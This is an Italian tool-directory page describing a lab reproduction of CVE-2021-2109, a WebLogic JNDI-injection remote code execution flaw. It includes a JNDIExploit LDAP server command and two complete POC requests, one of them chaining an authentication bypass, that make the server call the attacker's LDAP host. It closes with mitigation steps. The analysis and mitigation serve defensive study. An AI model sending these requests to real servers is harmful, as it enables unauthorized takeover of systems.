Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-2109 — Riproduzione e analisi passo-passo della CVE-2021-2109, una vulnerabilità di esecuzione di codice remoto nel server WebLogic tramite iniezione JNDI, con POC e guida alla mitigazione. | Kitploit
Strumenti/GitHubGitHub/rabbitsafe/cve-2021-2109
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubrabbitsafe/cve-2021-2109

CVE-2021-2109

Riproduzione e analisi passo-passo della CVE-2021-2109, una vulnerabilità di esecuzione di codice remoto nel server WebLogic tramite iniezione JNDI, con POC e guida alla mitigazione.

Vedi Repository
9555 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现及分析

Nel gennaio 2021, Oracle ha rilasciato aggiornamenti di sicurezza, inclusi 329 nuovi patch di sicurezza per la famiglia di prodotti Oracle. In questo annuncio è stato menzionato in particolare l'avviso di sicurezza per Oracle WebLogic Server relativo a CVE-2020-14750, rilasciato il 1º novembre 2020. Si consiglia vivamente ai clienti di applicare questo aggiornamento della patch e le altre patch contenute in questo annuncio. Il codice CVE-2021-2109 identifica una vulnerabilità di esecuzione remota di codice su WebLogic. La vulnerabilità è dovuta principalmente all'iniezione JNDI, che consente agli aggressori di sfruttare questa vulnerabilità per l'esecuzione remota di codice.

Versioni interessate: Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0

  1. Riproduzione della vulnerabilità di esecuzione remota di codice su Weblogic Server CVE-2021-2109

Utilizzare DOCKER per configurare un ambiente di test Weblogic Server. Weblogic Server è accessibile normalmente. image

  1. Esecuzione dell'iniezione JNDI con accesso normale al backend Primo caso: è necessario accedere al backend di Weblogic Server con un account amministratore, catturare il pacchetto di login tramite BurpSuite e ottenere i dati del cookie di login.

image

Avviare LDAP sulla macchina locale. Può essere scaricato da https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11. Il comando è il seguente: java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

image

Inviare il pacchetto POC di iniezione JNDI per la vulnerabilità di esecuzione remota di codice su Weblogic Server CVE-2021-2109: POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

image

Eseguire il comando di sistema ipconfig tramite la variabile cmd

image

  1. Esecuzione dell'iniezione JNDI sfruttando l'accesso non autorizzato al backend di Weblogic Server Secondo caso: non è necessario accedere al backend di Weblogic Server. È necessario sfruttare la vulnerabilità di accesso non autorizzato CVE-2020-14750 su Weblogic Server e inviare il pacchetto POC di iniezione JNDI per la vulnerabilità di esecuzione remota di codice CVE-2021-2109: POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

image

Eseguire calc.exe tramite la variabile cmd per aprire la calcolatrice di sistema.

image

image

La calcolatrice di sistema si apre.

image

  1. Raccomandazioni di sicurezza per la vulnerabilità di esecuzione remota di codice su Weblogic Server CVE-2021-2109

  2. Disabilitare il protocollo T3 Se non si dipende dal protocollo T3 per la comunicazione JVM, è possibile mitigare l'impatto di questa vulnerabilità bloccando temporaneamente il protocollo T3. 1). Accedere alla console di Weblogic, nella pagina di configurazione di base_domain, andare alla scheda 'Sicurezza', fare clic su 'Filtri' e configurare il filtro. 2). Nel filtro di connessione inserire: weblogic.security.net.ConnectionFilterImpl, nel campo delle regole del filtro di connessione inserire: * * 7001 deny t3 t3s.

  3. Disabilitare l'uso di IIOP Accedere alla console di Weblogic, trovare l'opzione 'Abilita IIOP', deselezionarla e riavviare per rendere effettiva la modifica.

  4. Disabilitare temporaneamente l'accesso esterno a /console/console.portal

  5. Applicare la patch di sicurezza ufficiale

Scarica lo strumento